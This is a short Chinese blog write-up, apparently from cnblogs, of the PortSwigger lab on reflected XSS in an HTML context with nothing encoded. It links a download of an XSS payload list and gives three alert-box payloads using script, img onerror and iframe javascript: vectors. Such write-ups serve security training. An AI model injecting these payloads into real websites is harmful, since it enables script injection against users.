burpsuite靶场----XSS----反射型XSS1

靶场地址

https://portswigger.net/web-security/cross-site-scripting/reflected/lab-html-context-nothing-encoded

XSS利用字典

链接：https://pan.baidu.com/s/1XAJbEc4o824zAAmvV85TOA
提取码：1234

正式开始

1.先输入一大长串字符

2.查看源码,找到输入的长串字符所在位置

3.本关的目标是弹窗
payload1:<script>alert(1)</script>
payload2:<img src=x onerror=alert(1)>
payload3:<iframe src=javascript:alert(1)>
等等

posted @ 2023-08-18 20:19 BattleofZhongDinghe 阅读(21) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

thebeastofwar

burpsuite靶场----XSS----反射型XSS1

burpsuite靶场----XSS----反射型XSS1

靶场地址

XSS利用字典

正式开始

公告